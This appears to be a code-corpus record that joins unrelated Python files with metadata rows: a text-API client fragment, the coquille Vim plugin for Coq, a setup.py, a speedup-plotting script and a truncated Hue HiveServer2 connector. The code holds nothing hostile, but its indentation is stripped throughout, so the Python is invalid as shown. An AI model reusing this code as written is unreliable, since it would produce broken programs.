sparsity, float: Sparsify the resulting expression to this percentage (optional)
Returns: Array[Fingerprint]
"""
resourcePath = '/expressions/bulk'
method = 'POST'
queryParams = {}
headerParams = {'Accept': 'Application/json', 'Content-Type': 'application/json'}
postData = None
queryParams['retina_name'] = retina_name
queryParams['sparsity'] = sparsity
postData = body
response = self.apiClient._callAPI(resourcePath, method, queryParams, postData, headerParams)
return [fingerprint.Fingerprint(**r) for r in response.json()]
def getContextsForBulkExpression(self, retina_name, body, get_fingerprint=None, start_index=0, max_results=5, sparsity=1.0):
"""Bulk get contexts for input expressions
Args:
retina_name, str: The retina name (required)
body, ExpressionOperation: The JSON encoded expression to be evaluated (required)
get_fingerprint, bool: Configure if the fingerprint should be returned as part of the results (optional)
start_index, int: The start-index for pagination (optional) (optional)
max_results, int: Max results per page (optional) (optional)
sparsity, float: Sparsify the resulting expression to this percentage (optional)
Returns: Array[Context]
"""
resourcePath = '/expressions/contexts/bulk'
method = 'POST'
queryParams = {}
headerParams = {'Accept': 'Application/json', 'Content-Type': 'application/json'}
postData = None
queryParams['retina_name'] = retina_name
queryParams['start_index'] = start_index
queryParams['max_results'] = max_results
queryParams['sparsity'] = sparsity
queryParams['get_fingerprint'] = get_fingerprint
postData = body
response = self.apiClient._callAPI(resourcePath, method, queryParams, postData, headerParams)
return [[context.Context(**c) for c in r] for r in response.json()]
def getSimilarTermsForBulkExpressionContext(self, retina_name, body, context_id=None, pos_type=None, get_fingerprint=None, start_index=0, max_results=10, sparsity=1.0):
"""Bulk get similar terms for input expressions
Args:
retina_name, str: The retina name (required)
body, ExpressionOperation: The JSON encoded expression to be evaluated (required)
context_id, int: The identifier of a context (optional) (optional)
pos_type, str: Part of speech (optional) (optional)
get_fingerprint, bool: Configure if the fingerprint should be returned as part of the results (optional)
start_index, int: The start-index for pagination (optional) (optional)
max_results, int: Max results per page (optional) (optional)
sparsity, float: Sparsify the resulting expression to this percentage (optional)
Returns: Array[Term]
"""
resourcePath = '/expressions/similar_terms/bulk'
method = 'POST'
queryParams = {}
headerParams = {'Accept': 'Application/json', 'Content-Type': 'application/json'}
postData = None
queryParams['retina_name'] = retina_name
queryParams['context_id'] = context_id
queryParams['start_index'] = start_index
queryParams['max_results'] = max_results
queryParams['pos_type'] = pos_type
queryParams['sparsity'] = sparsity
queryParams['get_fingerprint'] = get_fingerprint
postData = body
response = self.apiClient._callAPI(resourcePath, method, queryParams, postData, headerParams)
return [[term.Term(**t) for t in r] for r in response.json()]
|
bsd-2-clause
| -2,128,285,797,401,714,700
| 43.520408
| 172
| 0.637062
| false
| 4.298522
| false
| false
| false
|
bluelightning32/coquille
|
autoload/coquille.py
|
1
|
27276
|
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
import vim
import re
import xml.etree.ElementTree as ET
import coqtop as CT
import project_file
from collections import deque
import vimbufsync
vimbufsync.check_version([0,1,0], who="coquille")
# Define unicode in python 3
if isinstance(__builtins__, dict):
unicode = __builtins__.get('unicode', str)
else:
unicode = getattr(__builtins__, 'unicode', str)
# Cache whether vim has a bool type
vim_has_bool = vim.eval("exists('v:false')")
def vim_repr(value):
"Converts a python value into a vim value"
if isinstance(value, bool):
if value:
if vim_has_bool:
return "v:true"
else:
return "1"
else:
if vim_has_bool:
return "v:false"
else:
return "0"
if isinstance(value, int) or isinstance(value, long):
return str(value)
if isinstance(value, bytes):
value = value.decode("utf-8")
if isinstance(value, unicode):
return value.replace("'", "''")
return "unknown"
# Convert 0-based (line, col, byte) tuples into 1-based lists in the form
# [line, byte]
def make_vim_range(start, stop):
return [[start[0] + 1, start[2] + 1], [stop[0] + 1, stop[2] + 1]]
# Return a list of all windows that are displaying the buffer, along with their
# current cursor positions.
def get_cursors_for_buffer(vim_buffer):
result = []
for win in vim.windows:
if win.buffer is vim_buffer:
result.append((win, win.cursor))
return result
# Takes the list of window cursor positions from get_cursor_for_buffer. If the
# cursor position is now lower for any of the windows, they are entered to
# rescroll the window.
def fix_scroll(cursors):
refresh_now = None
for win, (row, col) in cursors:
if win.cursor[0] < row or win.cursor[1] < col:
win.vars['coquille_needs_scroll_fix'] = 1
if win.tabpage is vim.current.tabpage:
vim.command("call coquille#FixWindowScrollTabWin(%d, %d)" %
(win.tabpage.number, win.number))
# All the python side state associated with the vim source buffer
class BufferState(object):
# Dict mapping source buffer id to BufferState
source_mapping = {}
@classmethod
def lookup_bufid(cls, bufid):
# For convenience, the vim script passes vim.eval("l:bufid") to this
# function, and vim.eval() returns a string.
bufid = int(bufid)
if bufid in cls.source_mapping:
state = cls.source_mapping[bufid]
else:
state = BufferState(vim.buffers[bufid])
cls.source_mapping[bufid] = state
if state.sync_vars():
return state
else:
del cls.source_mapping[bufid]
return None
def __init__(self, source_buffer):
self.source_buffer = source_buffer
self.info_buffer = None
self.goal_buffer = None
#: See vimbufsync ( https://github.com/def-lkb/vimbufsync )
self.saved_sync = None
self.coq_top = CT.CoqTop()
def sync_vars(self):
"Updates python member variables based on the vim variables"
if not self.source_buffer.valid:
return False
if self.source_buffer.options["filetype"] != b"coq":
return False
goal_bufid = self.source_buffer.vars.get("coquille_goal_bufid", -1)
if goal_bufid != -1:
self.goal_buffer = vim.buffers[goal_bufid]
else:
self.goal_buffer = None
info_bufid = self.source_buffer.vars.get("coquille_info_bufid", -1)
if info_bufid != -1:
self.info_buffer = vim.buffers[info_bufid]
else:
self.info_buffer = None
return True
###################
# synchronization #
###################
def sync(self):
curr_sync = vimbufsync.sync(self.source_buffer)
if not self.saved_sync or curr_sync.buf() != self.saved_sync.buf():
if self.coq_top.get_active_command_count() > 1:
self._reset()
else:
(line, col) = self.saved_sync.pos()
# vim indexes from lines 1, coquille from 0
self.rewind_to(line - 1, col - 1)
self.saved_sync = curr_sync
def _reset(self):
self.coq_top.kill_coqtop()
self.saved_sync = None
self.reset_color()
#####################
# exported commands #
#####################
def kill_coqtop(self):
if self is None:
return
self._reset()
def goto_last_sent_dot(self):
last = self.coq_top.get_last_active_command()
(line, col) = ((0,1) if not last else last.end)
vim.current.window.cursor = (line + 1, col)
def coq_rewind(self, steps=1):
self.clear_info()
# Do not allow the root state to be rewound
if steps < 1 or self.coq_top.get_active_command_count() < 2:
return
if self.coq_top.coqtop is None:
print("Error: Coqtop isn't running. Are you sure you called :CoqLaunch?")
return
response = self.coq_top.rewind(steps)
if response is None:
vim.command("call coquille#KillSession()")
print('ERROR: the Coq process died')
return
self.refresh()
# steps != 1 means that either the user called "CoqToCursor" or just started
# editing in the "locked" zone. In both these cases we don't want to move
# the cursor.
if (steps == 1 and vim.eval('g:coquille_auto_move') == 'true'):
self.goto_last_sent_dot()
def coq_to_cursor(self):
if self.coq_top.coqtop is None:
print("Error: Coqtop isn't running. Are you sure you called :CoqLaunch?")
return
self.sync()
(cline, ccol) = vim.current.window.cursor
cline -= 1
last = self.coq_top.get_last_active_command()
last_sent = ((0,0,0) if not last else last.end)
(line, col, byte) = last_sent
if cline < line or (cline == line and ccol < col):
# Add 1 to the column to leave whatever is at the
# cursor as sent.
self.rewind_to(cline, ccol + 1)
else:
send_queue = deque([])
while True:
r = self._get_message_range(last_sent)
if (r is not None
and (r[1][0], r[1][1]) <= (cline, ccol + 1)):
last_sent = r[1]
send_queue.append(r)
else:
break
self.send_until_fail(send_queue)
def coq_next(self):
if self.coq_top.coqtop is None:
print("Error: Coqtop isn't running. Are you sure you called :CoqLaunch?")
return
self.sync()
last = self.coq_top.get_last_active_command()
last_sent = ((0,0,0) if not last else last.end)
message_range = self._get_message_range(last_sent)
if message_range is None: return
send_queue = deque([])
send_queue.append(message_range)
self.send_until_fail(send_queue)
if (vim.eval('g:coquille_auto_move') == 'true'):
self.goto_last_sent_dot()
def coq_raw_query(self, *args):
self.clear_info()
if self.coq_top.coqtop is None:
print("Error: Coqtop isn't running. Are you sure you called :CoqLaunch?")
return
raw_query = ' '.join(args)
response = self.coq_top.query(raw_query)
if response is None:
vim.command("call coquille#KillSession()")
print('ERROR: the Coq process died')
return
info_msg = self.coq_top.get_messages()
self.show_info(info_msg)
def launch_coq(self, *args):
use_project_args = self.source_buffer.vars.get(
"coquille_append_project_args",
vim.vars.get("coquille_append_project_args", 0))
if use_project_args:
# Vim passes the args as a tuple
args = list(args)
args.extend(project_file.find_and_parse_file(
self.source_buffer.name))
return self.coq_top.restart_coq(*args)
def debug(self):
commands = self.coq_top.get_active_commands()
print("encountered dots = [")
for (line, col) in commands:
print(" (%d, %d) ; " % (line, col))
print("]")
#####################################
# IDE tools: Goal, Infos and colors #
#####################################
def refresh(self):
last_info = [None]
def update():
self.reset_color()
vim.command('redraw')
new_info = self.coq_top.get_messages()
if last_info[0] != new_info:
self.show_info(new_info)
last_info[0] = new_info
# It seems that coqtop needs some kind of call like Status or Goal to
# trigger it to start processing all the commands that have been added.
# So show_goal needs to be called before waiting for all the unchecked
# commands finished.
response = self.coq_top.goals(update)
if self.show_goal(response):
while self.coq_top.has_unchecked_commands():
self.coq_top.process_response()
update()
update()
def show_goal(self, response):
# Temporarily make the goal buffer modifiable
modifiable = self.goal_buffer.options["modifiable"]
self.goal_buffer.options["modifiable"] = True
try:
cursors = get_cursors_for_buffer(self.goal_buffer)
del self.goal_buffer[:]
if response is None:
return False
goals = response.val
if goals is None:
self.goal_buffer[0] = 'No goals.'
return True
sub_goals = goals.fg
msg_format = '{0} subgoal{1}'
show_hyps = True
if not sub_goals:
show_hyps = False
sub_goals = []
for (before, after) in goals.bg:
sub_goals.extend(reversed(before))
sub_goals.extend(after)
if sub_goals:
msg_format = ('This subproof is complete, but there {2} {0}'
' unfocused goal{1}')
if not sub_goals:
msg_format = 'No more subgoals.'
nb_subgoals = len(sub_goals)
self.goal_buffer[0] = msg_format.format(nb_subgoals,
'' if nb_subgoals == 1 else 's',
'is' if nb_subgoals == 1 else 'are')
self.goal_buffer.append([''])
for idx, sub_goal in enumerate(sub_goals):
_id = sub_goal.id
hyps = sub_goal.hyp
ccl = sub_goal.ccl
if show_hyps:
# we print the environment only for the current subgoal
for hyp in hyps:
lst = map(lambda s: s.encode('utf-8'), hyp.split('\n'))
self.goal_buffer.append(list(lst))
show_hyps = False
self.goal_buffer.append('')
self.goal_buffer.append('======================== ( %d / %d )' % (idx+1 , nb_subgoals))
lines = map(lambda s: s.encode('utf-8'), ccl.split('\n'))
self.goal_buffer.append(list(lines))
self.goal_buffer.append('')
fix_scroll(cursors)
finally:
self.goal_buffer.options["modifiable"] = modifiable
return True
def show_info(self, message):
# Temporarily make the info buffer modifiable
modifiable = self.info_buffer.options["modifiable"]
self.info_buffer.options["modifiable"] = True
try:
cursors = get_cursors_for_buffer(self.info_buffer)
del self.info_buffer[:]
lst = []
if message is not None:
lst = list(map(lambda s: s.encode('utf-8'),
message.split('\n')))
if len(lst) >= 1:
# If self.info_buffers was a regular list, the del statement
# above would have deleted all the lines. However with a vim
# buffer, that actually leaves 1 blank line. So now for setting
# the new contents, the very first line has to be overwritten,
# then the rest can be appended.
#
# Also note that if info_buffer was a list, extend would be the
# appropriate function. However info_buffer does not have an
# extend function, and its append mostly behaves like extend.
self.info_buffer[0] = lst[0]
self.info_buffer.append(lst[1:])
fix_scroll(cursors)
finally:
self.info_buffer.options["modifiable"] = modifiable
def clear_info(self):
self.coq_top.clear_messages()
self.show_info(None)
def convert_offset(self, range_start, offset, range_end):
message = self._between(range_start, range_end)
(line, col, byte) = _pos_from_offset(range_start[1], range_start[2],
message, offset)
return (line + range_start[0], col, byte)
def reset_color(self):
sent = []
checked = []
warnings = []
errors = []
prev_end = None
sent_start = None
checked_start = None
commands = self.coq_top.get_commands()
for c in commands:
if c.state in (CT.Command.REVERTED, CT.Command.ABANDONED):
break
if c.state == CT.Command.SENT:
if sent_start is None:
# Start a sent range
sent_start = prev_end
elif sent_start is not None:
# Finish a sent range
sent.append(make_vim_range(sent_start, prev_end))
sent_start = None
# Include all the processed commands as checked, even if they
# produced a warning or error message. A subrange will also be
# marked as a warning or error, but that will override the checked
# group.
if c.state == CT.Command.PROCESSED:
if checked_start is None:
# Start a checked range
checked_start = prev_end
elif checked_start is not None:
# Finish a checked range
checked.append(make_vim_range(checked_start, prev_end))
checked_start = None
prev_end = c.end
if sent_start is not None:
# Finish a sent range
sent.append(make_vim_range(sent_start, prev_end))
if checked_start is not None:
# Finish a checked range
checked.append(make_vim_range(checked_start, prev_end))
prev_end = None
for c in commands:
if c.msg_type != CT.Command.NONE:
# Normalize the start and stop positions, if it hasn't been done yet.
if c.msg_start_offset is not None and c.msg_start is None:
c.msg_start = self.convert_offset(prev_end,
c.msg_start_offset,
c.end)
if c.msg_stop_offset is not None and c.msg_stop is None:
c.msg_stop = self.convert_offset(prev_end,
c.msg_stop_offset,
c.end)
start = c.msg_start
stop = c.msg_stop
if start == stop:
start = prev_end
stop = c.end
if c.msg_type == CT.Command.WARNING:
warnings.append(make_vim_range(start, stop))
else:
errors.append(make_vim_range(start, stop))
prev_end = c.end
self.source_buffer.vars['coquille_sent'] = sent
self.source_buffer.vars['coquille_checked'] = checked
self.source_buffer.vars['coquille_warnings'] = warnings
self.source_buffer.vars['coquille_errors'] = errors
vim.command("call coquille#SyncBufferColors(%d)" %
self.source_buffer.number)
def rewind_to(self, line, col):
""" Go backwards to the specified position
line and col are 0-based and point to the first position to
remove from the sent region.
"""
if self.coq_top.coqtop is None:
print('Internal error: vimbufsync is still being called but coqtop\
appears to be down.')
print('Please report.')
return
last = self.coq_top.get_last_active_command()
if (last and (last.end[0], last.end[1]) <= (line, col)):
# The caller asked to rewind to a position after what has been
# processed. This quick path exits without having to search the
# state list.
return
predicate = lambda x: (x.end[0], x.end[1]) <= (line, col)
commands = self.coq_top.get_active_commands()
lst = filter(predicate, commands)
steps = len(commands) - len(list(lst))
if steps != 0:
self.coq_rewind(steps)
#############################
# Communication with Coqtop #
#############################
def send_until_fail(self, send_queue):
"""
Tries to send every message in [send_queue] to Coq, stops at the first
error.
When this function returns, [send_queue] is empty.
"""
self.clear_info()
# Start sending on a background thread
self.coq_top.send_async(send_queue)
# Redraw the screen when the background thread makes progress
while True:
result = self.coq_top.wait_for_result()
if result & CT.CoqTop.COMMAND_CHANGED:
self.reset_color()
vim.command('redraw')
if result & CT.CoqTop.MESSAGE_RECEIVED:
new_info = self.coq_top.get_messages()
self.show_info(new_info)
if result & CT.CoqTop.SEND_DONE:
break
self.coq_top.finish_send()
self.refresh()
#################
# Miscellaneous #
#################
# col_offset is a character offset, not byte offset
def _get_remaining_line(self, line, col_offset):
s = self.source_buffer[line]
if not isinstance(s, unicode):
s = s.decode("utf-8")
return s[col_offset:]
def _between(self, begin, end):
"""
Returns a string corresponding to the portion of the buffer between the
[begin] and [end] positions.
"""
(bline, bcol, bbyte) = begin
(eline, ecol, ebyte) = end
acc = ""
for line, str in enumerate(self.source_buffer[bline:eline + 1]):
if not isinstance(str, unicode):
str = str.decode("utf-8")
start = bcol if line == 0 else 0
stop = ecol + 1 if line == eline - bline else len(str)
acc += str[start:stop] + '\n'
return acc
# Convert a pos from (line, col) to (line, col, byte_offset)
#
# The byte_offset is relative to the start of the line. It is the same as
# col, unless there are non-ascii characters.
#
# line, col, and byte_offset are all 0-indexed.
def _add_byte_offset(self, pos):
(line, col) = pos
s = self.source_buffer[line]
if not isinstance(s, unicode):
s = s.decode("utf-8")
return (line, col, len(s[:col].encode("utf-8")))
def _get_message_range(self, after):
""" See [_find_next_chunk] """
(line, col, byte) = after
end_pos = self._find_next_chunk(line, col)
if end_pos is None:
return None
else:
end_pos = self._add_byte_offset(end_pos)
(eline, ecol, ebyte) = end_pos
message = self._between(after,
(eline, ecol - 1, ebyte - 1))
return (message, end_pos)
# A bullet is:
# - One or more '-'
# - One or more '+'
# - One or more '*'
# - Exactly 1 '{' (additional ones are parsed as separate statements)
# - Exactly 1 '}' (additional ones are parsed as separate statements)
bullets = re.compile("-+|\++|\*+|{|}")
def _find_next_chunk(self, line, col):
"""
Returns the position of the next chunk dot after a certain position.
That can either be a bullet if we are in a proof, or "a string" terminated
by a dot (outside of a comment, and not denoting a path).
"""
blen = len(self.source_buffer)
# We start by striping all whitespaces (including \n) from the beginning of
# the chunk.
while line < blen:
line_val = self.source_buffer[line]
if not isinstance(line_val, unicode):
line_val = line_val.decode("utf-8")
while col < len(line_val) and line_val[col] in (' ', '\t'):
col += 1
if col < len(line_val) and line_val[col] not in (' ', '\t'):
break
line += 1
col = 0
if line >= blen: return
# Then we check if the first character of the chunk is a bullet.
# Intially I did that only when I was sure to be in a proof (by looking in
# [encountered_dots] whether I was after a "collapsable" chunk or not), but
# 1/ that didn't play well with coq_to_cursor (as the "collapsable chunk"
# might not have been sent/detected yet).
# 2/ The bullet chars can never be used at the *beginning* of a chunk
# outside of a proof. So the check was unecessary.
bullet_match = self.bullets.match(line_val, col)
if bullet_match:
return (line, bullet_match.end())
# We might have a commentary before the bullet, we should be skiping it and
# keep on looking.
tail_len = len(line_val) - col
if ((tail_len - 1 > 0) and line_val[col] == '('
and line_val[col + 1] == '*'):
com_end = self._skip_comment(line, col + 2, 1)
if not com_end: return
(line, col) = com_end
return self._find_next_chunk(line, col)
# If the chunk doesn't start with a bullet, we look for a dot.
dot = self._find_dot_after(line, col)
if dot:
# Return the position one after the dot
return (dot[0], dot[1] + 1)
else:
return None
def _find_dot_after(self, line, col):
"""
Returns the position of the next "valid" dot after a certain position.
Valid here means: recognized by Coq as terminating an input, so dots in
comments, strings or ident paths are not valid.
"""
if line >= len(self.source_buffer): return
s = self._get_remaining_line(line, col)
dot_pos = s.find('.')
com_pos = s.find('(*')
str_pos = s.find('"')
if com_pos == -1 and dot_pos == -1 and str_pos == -1:
# Nothing on this line
return self._find_dot_after(line + 1, 0)
elif dot_pos == -1 or (com_pos > - 1 and dot_pos > com_pos) or (str_pos > - 1 and dot_pos > str_pos):
if str_pos == -1 or (com_pos > -1 and str_pos > com_pos):
# We see a comment opening before the next dot
com_end = self._skip_comment(line, com_pos + 2 + col, 1)
if not com_end: return
(line, col) = com_end
return self._find_dot_after(line, col)
else:
# We see a string starting before the next dot
str_end = self._skip_str(line, str_pos + col + 1)
if not str_end: return
(line, col) = str_end
return self._find_dot_after(line, col)
elif dot_pos < len(s) - 1 and s[dot_pos + 1] != ' ':
# Sometimes dot are used to access module fields, we don't want to stop
# just after the module name.
# Example: [Require Import Coq.Arith]
return self._find_dot_after(line, col + dot_pos + 1)
elif dot_pos + col > 0 and self._get_remaining_line(line, col + dot_pos - 1)[0] == '.':
# FIXME? There might be a cleaner way to express this.
# We don't want to capture ".."
if dot_pos + col > 1 and self._get_remaining_line(line, col + dot_pos - 2)[0] == '.':
# But we want to capture "..."
return (line, dot_pos + col)
else:
return self._find_dot_after(line, col + dot_pos + 1)
else:
return (line, dot_pos + col)
# TODO? factorize [_skip_str] and [_skip_comment]
def _skip_str(self, line, col):
"""
Used when we encountered the start of a string before a valid dot (see
[_find_dot_after]).
Returns the position of the end of the string.
"""
while True:
if line >= len(self.source_buffer): return
s = self._get_remaining_line(line, col)
str_end = s.find('"')
if str_end > -1:
return (line, col + str_end + 1)
line += 1
col = 0
def _skip_comment(self, line, col, nb_left):
"""
Used when we encountered the start of a comment before a valid dot (see
[_find_dot_after]).
Returns the position of the end of the comment.
"""
while nb_left > 0:
if line >= len(self.source_buffer): return None
s = self._get_remaining_line(line, col)
com_start = s.find('(*')
com_end = s.find('*)')
if com_end > -1 and (com_end < com_start or com_start == -1):
col += com_end + 2
nb_left -= 1
elif com_start > -1:
col += com_start + 2
nb_left += 1
else:
line += 1
col = 0
return (line, col)
def _empty_range():
return [ { 'line': 0, 'col': 0}, { 'line': 0, 'col': 0} ]
# Converts a byte offset into a message into a (line, col, byte) tuple
#
# msg is a unicode string the offset is relative to. col is the column where
# msg starts, and byte is the byte offset where it starts.
#
# All indecies are 0 based.
def _pos_from_offset(col, byte, msg, offset):
str = msg.encode("utf-8")[:offset].decode("utf-8")
lst = str.split('\n')
line = len(lst) - 1
col = len(lst[-1]) + (col if line == 0 else 0)
byte = len(lst[-1].encode("utf-8")) + (byte if line == 0 else 0)
return (line, col, byte)
|
isc
| -3,639,177,339,411,047,000
| 36.778393
| 109
| 0.530356
| false
| 3.887685
| false
| false
| false
|
blink1073/image_inspector
|
setup.py
|
1
|
1488
|
"""Setup script for image_inspector package.
"""
DISTNAME = 'iminspector'
DESCRIPTION = 'Image Interaction widgets and viewer.'
LONG_DESCRIPTION = open('README.rst', 'rb').read().decode('utf-8')
MAINTAINER = 'Steven Silvester'
MAINTAINER_EMAIL = 'steven.silvester@ieee.org'
URL = 'http://github.com/blink1073/image_inspector'
LICENSE = 'MIT'
REQUIRES = ["numpy (>= 1.7.1)", "matplotlib (>= 1.4)"]
CLASSIFIERS = """\
Intended Audience :: Developers
Intended Audience :: Science/Research
License :: OSI Approved :: MIT License
Operating System :: OS Independent
Programming Language :: Python
Programming Language :: Python :: 2.7
Programming Language :: Python :: 3.3
Programming Language :: Python :: 3.4
Topic :: Scientific/Engineering
Topic :: Software Development
"""
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
with open('iminspector/__init__.py', 'rb') as fid:
for line in fid:
line = line.decode('utf-8')
if line.startswith('__version__'):
version = line.strip().split()[-1][1:-1]
break
setup(
name=DISTNAME,
version=version,
maintainer=MAINTAINER,
maintainer_email=MAINTAINER_EMAIL,
url=URL,
download_url=URL,
license=LICENSE,
platforms=["Any"],
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
classifiers=list(filter(None, CLASSIFIERS.split('\n'))),
requires=REQUIRES
)
|
mit
| -5,003,442,439,908,984,000
| 27.76
| 66
| 0.66129
| false
| 3.542857
| false
| false
| false
|
vnleonenko/Influenza
|
experiments/draw_speedup.py
|
1
|
2138
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Auxiliary script for paper, DGTS conference.
Draw speedup graph
"""
import json
import time
import matplotlib
import matplotlib.pyplot as plt
from common import RESULTS_PATH
SPEEDUP_FILE = RESULTS_PATH + '/dgts/speedup.json'
OUTPUT_FILE = RESULTS_PATH + '/dgts/speedup.pdf'
def main():
data = {}
with open(SPEEDUP_FILE) as f:
data = json.load(f)
speedups = dict()
for size, measurements in data.items():
if int(size) == 1:
continue # pass trivial case
one_process = float(measurements["1"])
for process_count, seconds in measurements.items():
if int(process_count) == 1:
continue # speedup for 1 process === 1.0
try:
speedups[int(process_count)][int(size)] = one_process / float(seconds)
except KeyError:
speedups[int(process_count)] = {int(size): one_process / float(seconds)}
fig = plt.figure(figsize=(10, 6)) # if smooth else (20, 12))
matplotlib.rcParams.update({'font.size': 20})
ax = fig.add_subplot(111)
sizes = next(iter(speedups.values())).keys()
x_axis = [i for i in range(min(sizes), max(sizes) + 1)]
colors = {'c', 'm', 'y', 'k'}
opt_color = {
2: 'b', 4: 'r', 8: 'g',
}
for process_count, measurements in speedups.items():
speedup_list = [measurements[key] for key in sorted(measurements.keys())]
if process_count not in opt_color:
opt_color[process_count] = colors.pop()
plt.plot(x_axis, speedup_list, opt_color[process_count] + "o-",
label='%d processes speedup' % (process_count),
linewidth=2.0)
plt.xlabel('Time periods')
plt.ylabel('Speedup')
plt.legend(loc='lower right', numpoints=1,
prop={'size': 16}, fancybox=True, shadow=True)
plt.grid()
plt.savefig(OUTPUT_FILE, dpi=450, format='pdf', bbox_inches='tight')
plt.show()
if __name__ == '__main__':
t0 = time.time()
main()
print('Total elapsed: %d seconds' % (time.time() - t0))
|
gpl-3.0
| 9,161,574,696,086,953,000
| 27.506667
| 88
| 0.581384
| false
| 3.415335
| false
| false
| false
|
fangxingli/hue
|
desktop/libs/notebook/src/notebook/connectors/hiveserver2.py
|
1
|
19836
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import logging
import re
import StringIO
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext as _
from desktop.conf import USE_DEFAULT_CONFIGURATION
from desktop.lib.conf import BoundConfig
from desktop.lib.exceptions import StructuredException
from desktop.lib.exceptions_renderable import PopupException
from desktop.lib.i18n import force_unicode
from desktop.models import DefaultConfiguration
from notebook.connectors.base import Api, QueryError, QueryExpired, OperationTimeout
LOG = logging.getLogger(__name__)
try:
from beeswax import data_export
from beeswax.api import _autocomplete, _get_sample_data
from beeswax.conf import CONFIG_WHITELIST as hive_settings
from beeswax.data_export import upload
from beeswax.design import hql_query, strip_trailing_semicolon, split_statements
from beeswax import conf as beeswax_conf
from beeswax.models import QUERY_TYPES, HiveServerQueryHandle, HiveServerQueryHistory, QueryHistory, Session
from beeswax.server import dbms
from beeswax.server.dbms import get_query_server_config, QueryServerException
from beeswax.views import _parse_out_hadoop_jobs
except ImportError, e:
LOG.warn('Hive and HiveServer2 interfaces are not enabled')
hive_settings = None
try:
from impala import api # Force checking if Impala is enabled
from impala.conf import CONFIG_WHITELIST as impala_settings
except ImportError, e:
LOG.warn("Impala app is not enabled")
impala_settings = None
DEFAULT_HIVE_ENGINE = 'mr'
def query_error_handler(func):
def decorator(*args, **kwargs):
try:
return func(*args, **kwargs)
except StructuredException, e:
message = force_unicode(str(e))
if 'timed out' in message:
raise OperationTimeout(e)
else:
raise QueryError(message)
except QueryServerException, e:
message = force_unicode(str(e))
if 'Invalid query handle' in message or 'Invalid OperationHandle' in message:
raise QueryExpired(e)
else:
raise QueryError(message)
return decorator
def is_hive_enabled():
return hive_settings is not None and type(hive_settings) == BoundConfig
def is_impala_enabled():
return impala_settings is not None and type(impala_settings) == BoundConfig
class HiveConfiguration(object):
APP_NAME = 'hive'
PROPERTIES = [
{
"multiple": True,
"defaultValue": [],
"value": [],
"nice_name": _("Files"),
"key": "files",
"help_text": _("Add one or more files, jars, or archives to the list of resources."),
"type": "hdfs-files"
}, {
"multiple": True,
"defaultValue": [],
"value": [],
"nice_name": _("Functions"),
"key": "functions",
"help_text": _("Add one or more registered UDFs (requires function name and fully-qualified class name)."),
"type": "functions"
}, {
"multiple": True,
"defaultValue": [],
"value": [],
"nice_name": _("Settings"),
"key": "settings",
"help_text": _("Hive and Hadoop configuration properties."),
"type": "settings",
"options": [config.lower() for config in hive_settings.get()] if is_hive_enabled() and hasattr(hive_settings, 'get') else []
}
]
class ImpalaConfiguration(object):
APP_NAME = 'impala'
PROPERTIES = [
{
"multiple": True,
"defaultValue": [],
"value": [],
"nice_name": _("Settings"),
"key": "settings",
"help_text": _("Impala configuration properties."),
"type": "settings",
"options": [config.lower() for config in impala_settings.get()] if is_impala_enabled() else []
}
]
class HS2Api(Api):
@staticmethod
def get_properties(lang='hive'):
return ImpalaConfiguration.PROPERTIES if lang == 'impala' else HiveConfiguration.PROPERTIES
@query_error_handler
def create_session(self, lang='hive', properties=None):
application = 'beeswax' if lang == 'hive' else lang
session = Session.objects.get_session(self.user, application=application)
if session is None:
session = dbms.get(self.user, query_server=get_query_server_config(name=lang)).open_session(self.user)
response = {
'type': lang,
'id': session.id
}
if not properties:
config = None
if USE_DEFAULT_CONFIGURATION.get():
config = DefaultConfiguration.objects.get_configuration_for_user(app=lang, user=self.user)
if config is not None:
properties = config.properties_list
else:
properties = self.get_properties(lang)
response['properties'] = properties
if lang == 'impala':
impala_settings = session.get_formatted_properties()
http_addr = next((setting['value'] for setting in impala_settings if setting['key'].lower() == 'http_addr'), None)
response['http_addr'] = http_addr
return response
@query_error_handler
def close_session(self, session):
app_name = session.get('type')
session_id = session.get('id')
query_server = get_query_server_config(name=app_name)
response = {'status': -1, 'message': ''}
try:
filters = {'id': session_id, 'application': query_server['server_name']}
if not self.user.is_superuser:
filters['owner'] = self.user
session = Session.objects.get(**filters)
except Session.DoesNotExist:
response['message'] = _('Session does not exist or you do not have permissions to close the session.')
if session:
session = dbms.get(self.user, query_server).close_session(session)
response['status'] = 0
response['message'] = _('Session successfully closed.')
response['session'] = {'id': session_id, 'application': session.application, 'status': session.status_code}
return response
@query_error_handler
def execute(self, notebook, snippet):
db = self._get_db(snippet)
statement = self._get_current_statement(db, snippet)
session = self._get_session(notebook, snippet['type'])
query = self._prepare_hql_query(snippet, statement['statement'], session)
try:
db.use(query.database)
handle = db.client.query(query)
except QueryServerException, ex:
raise QueryError(ex.message, handle=statement)
# All good
server_id, server_guid = handle.get()
response = {
'secret': server_id,
'guid': server_guid,
'operation_type': handle.operation_type,
'has_result_set': handle.has_result_set,
'modified_row_count': handle.modified_row_count,
'log_context': handle.log_context,
}
response.update(statement)
return response
@query_error_handler
def check_status(self, notebook, snippet):
response = {}
db = self._get_db(snippet)
handle = self._get_handle(snippet)
operation = db.get_operation_status(handle)
status = HiveServerQueryHistory.STATE_MAP[operation.operationState]
if status.index in (QueryHistory.STATE.failed.index, QueryHistory.STATE.expired.index):
if operation.errorMessage and 'transition from CANCELED to ERROR' in operation.errorMessage: # Hive case on canceled query
raise QueryExpired()
else:
raise QueryError(operation.errorMessage)
response['status'] = 'running' if status.index in (QueryHistory.STATE.running.index, QueryHistory.STATE.submitted.index) else 'available'
return response
@query_error_handler
def fetch_result(self, notebook, snippet, rows, start_over):
db = self._get_db(snippet)
handle = self._get_handle(snippet)
results = db.fetch(handle, start_over=start_over, rows=rows)
# No escaping...
return {
'has_more': results.has_more,
'data': results.rows(),
'meta': [{
'name': column.name,
'type': column.type,
'comment': column.comment
